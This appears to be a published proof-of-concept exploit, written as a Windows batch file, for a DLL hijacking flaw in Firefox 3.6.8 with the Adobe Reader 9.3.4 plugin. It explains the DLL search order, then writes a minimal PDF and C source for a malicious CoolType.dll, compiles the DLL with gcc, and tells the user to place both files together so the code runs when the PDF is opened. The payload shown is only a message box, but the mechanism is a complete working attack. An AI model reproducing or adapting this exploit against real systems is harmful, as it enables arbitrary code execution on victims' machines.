@echo off GOTO START * [*] * [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll) * [*] * [*] Author: Rh0 (Rh0[at]z1p.biz) * [*] Date: August 26, 2010 * [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218 * [*] Tested on: Windows XP Pro SP3 x86 En * [*] Description: * * Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd * * When Firefox plugins are used, the necessary DLLs for the plugin to run * are searched in folders in the following order: * * mozilla firefox dir * windows system32 dir * windows system dir * windows dir * current dir <-- hijack possibility * plugin program dir * * Hence, depending on the actual file, the plugin and the needed DLLs, plugin DLLs can be hijacked. * just 2 examples for the Adobe Reader plugin: * CoolType.dll * authplay.dll (if the pdf contains an embedded swf file) * * This Batch File example creates an mininal pdf file, CoolType.c and * compiles it to CoolType.dll (gcc has to be installed). * When opening the pdf with Firefox, CoolType.dll gets executed, if both files are in the same directory. * So embedded pdf files in a html file could be used to hijack Adobe Reader DLLs. * For this exploit to work, Firefox and the Adober Reader 9.3.4 plugin have to be installed. * To test the other extensions simply change the extension of the pdf file, and open it with firefox :START echo. echo [*] echo [*] Creating pdf file... REM PDF FILENAME set pdf=OpenwithFirefox.pdf echo %%PDF-1.4>"%pdf%" echo %%Çìó¢>>"%pdf%" echo 1 0 obj ^<^< /Type /Catalog /ViewerPreferences ^<^< /NonFullScreenPageMode /UseNone ^>^> /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^>^> endobj>>"%pdf%" echo 2 0 obj ^<^< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^>^> endobj>>"%pdf%" echo 3 0 obj ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> endobj>>"%pdf%" echo 4 0 obj ^<^< /Producer (PDF::API2 0.69 [linux]) ^>^> endobj>>"%pdf%" echo 5 0 obj ^<^< /Type /Page /Parent 2 0 R /Resources ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> ^>^> endobj>>"%pdf%" echo xref>>"%pdf%" echo 0 6 >>"%pdf%" echo 0000000000 65535 f>>"%pdf%" echo 0000000015 00000 n>>"%pdf%" echo 0000000164 00000 n>>"%pdf%" echo 0000000240 00000 n>>"%pdf%" echo 0000000309 00000 n>>"%pdf%" echo 0000000365 00000 n>>"%pdf%" echo trailer>>"%pdf%" echo ^<^< /Root 1 0 R /Size 6 /Info 4 0 R ^>^>>>"%pdf%" echo startxref>>"%pdf%" echo 477>>"%pdf%" echo %%%%EOF>>"%pdf%" echo [*] %pdf% created. echo [*] echo [*] Creating CoolType.c source... REM PDF FILENAME set dllsrc=CoolType.c echo #include ^>"%dllsrc%" echo #define DLLExport __declspec (dllexport)>>"%dllsrc%" echo int runme()>>"%dllsrc%" echo {>>"%dllsrc%" echo MessageBox(0, "Firefox with Adobe Reader Plugin DLL Hijacking", "Message from CoolType.dll", MB_OK);>>"%dllsrc%" echo return 0;>>"%dllsrc%" echo }>>"%dllsrc%" echo DLLExport void CTCleanup() { runme(); }>>"%dllsrc%" echo DLLExport void CTGetVersion() { runme(); }>>"%dllsrc%" echo DLLExport void CTInit() { runme(); }>>"%dllsrc%" echo [*] Done. echo [*] Compiling CoolType.dll... gcc -shared -o CoolType.dll CoolType.c echo [*] Done echo [*] echo [*] Copy "%pdf%" and CoolType.dll to the same echo [*] directory, open directory in windows explorer echo [*] and open "%pdf%" in Firefox. echo [*] pause